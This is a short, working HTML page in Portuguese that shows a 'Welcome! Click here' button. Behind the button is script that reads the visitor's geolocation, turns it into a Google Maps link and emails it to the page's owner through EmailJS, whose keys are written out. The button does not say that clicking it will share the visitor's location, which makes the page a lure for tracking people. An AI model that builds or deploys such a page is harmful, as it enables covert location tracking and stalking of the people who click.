
<!DOCTYPE html>
<html lang="pt-BR">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Bem-vindo</title>
  <style>
    body { font-family: sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; background: #f0f8ff; }
    button { font-size: 20px; padding: 15px 30px; border: none; border-radius: 10px; background-color: #28a745; color: white; cursor: pointer; }
  </style>
</head>
<body>
  <button onclick="enviarLocalizacao()">Bem-vindo! Clique aqui</button>

  <script src="https://cdn.jsdelivr.net/npm/emailjs-com@3/dist/email.min.js"></script>
  <script>
    (function() {
      emailjs.init("Bchhzp9De514hGjFr");
    })();

    function enviarLocalizacao() {
      if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(function(position) {
          const latitude = position.coords.latitude;
          const longitude = position.coords.longitude;
          const data = {
            latitude: latitude,
            longitude: longitude,
            mensagem: `Localização recebida: https://www.google.com/maps?q=${latitude},${longitude}`
          };
          emailjs.send("service_lecvq4k", "template_d835ahu", data)
            .then(function(response) {
              alert("Localização enviada com sucesso!");
            }, function(error) {
              alert("Erro ao enviar localização: " + JSON.stringify(error));
            });
        }, function(error) {
          alert("Erro ao obter localização: " + error.message);
        });
      } else {
        alert("Geolocalização não suportada pelo navegador.");
      }
    }
  </script>
</body>
</html>
